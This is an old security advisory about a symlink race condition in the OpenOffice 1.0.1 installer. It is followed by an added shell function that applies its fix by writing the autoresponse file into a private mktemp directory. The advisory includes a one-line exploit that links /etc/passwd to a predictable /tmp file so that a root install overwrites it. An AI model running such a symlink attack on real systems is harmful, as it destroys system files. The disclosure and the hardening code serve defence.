From: Larry W. Cashdollar (lwc_at_vapid.ath.cx)
Date: Fri Oct 11 2002 - 08:51:22 CDT


                             Vapid Labs
                        Larry W. Cashdollar
                              9/9/02

    Summary: OpenOffice 1.0.1 Race condition during installation can overwrite
    system files.

    Severity: Low

    Description: A very simple and easy to exploit race condition exists during the
     installation of OpenOffice. During this window a malicious user could create a
     symlink in /tmp and overwrite arbitrary files.

    Exploit:

    As a normal user:

    lwc $ ln -s /etc/passwd /tmp/$USERNAME_autoresponse.conf

    Where $USERNAME is the installer account name, probably root.

    This will result in the password file being overwritten with:

    # create the proper autoresponse file
    cat << EOF > /tmp/${USER}_autoresponse.conf
    [ENVIRONMENT]
    INSTALLATIONMODE=$installtype
    INSTALLATIONTYPE=STANDARD
    DESTINATIONPATH=$prefix/$oo_home
    OUTERPATH=
    LOGFILE=
    LANGUAGELIST=<LANGUAGE>

    [JAVA]
    JavaSupport=preinstalled_or_none

    EOF

    Fix:
        Create a directory under /tmp to work from, with restrictive permissions.

    References:

    http://www.openoffice.org/dev_docs/source/1.0.1/index.html

    Larry W. Cashdollar
    lwc_at_vapid.ath.cx
    http://vapid.ath.cx
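
The fix named in the advisory, written out as an added example (not code from the advisory or from the OpenOffice installer): the autoresponse file is created inside a private directory made by mktemp -d instead of at a predictable name in /tmp. The function name write_autoresponse and the oo_install prefix are assumptions; the file contents are copied from the installer excerpt above.

```sh
#!/bin/sh
# Added example: hardened form of the installer's "create the proper
# autoresponse file" step. write_autoresponse is a hypothetical helper name.
#
#   $1 = installation mode  (the installer's $installtype)
#   $2 = destination path   (the installer's $prefix/$oo_home)
#
# Prints the path of the new file on success; returns non-zero on failure.
# The body runs in a subshell, so umask and noclobber do not leak to the caller.
write_autoresponse() (
    # New files and directories are readable and writable by the owner only.
    umask 077
    # noclobber: '>' refuses to write through a path that already exists.
    set -C
    # mktemp -d picks an unpredictable name, creates the directory with mode
    # 0700, and fails instead of reusing a path someone else put there.
    workdir=$(mktemp -d "${TMPDIR:-/tmp}/oo_install.XXXXXX") || exit 1
    conf="$workdir/autoresponse.conf"
    cat > "$conf" << EOF || exit 1
[ENVIRONMENT]
INSTALLATIONMODE=$1
INSTALLATIONTYPE=STANDARD
DESTINATIONPATH=$2
OUTERPATH=
LOGFILE=
LANGUAGELIST=<LANGUAGE>

[JAVA]
JavaSupport=preinstalled_or_none

EOF
    printf '%s\n' "$conf"
)

# Typical call from the installer script (variables as in the excerpt above):
#   conf=$(write_autoresponse "$installtype" "$prefix/$oo_home") || exit 1
# Remove "$(dirname "$conf")" once the setup program has read the file.
```

Because only the installing user can enter the 0700 directory, another local user has no place to plant a symlink, and the file name inside it no longer needs to be unpredictable.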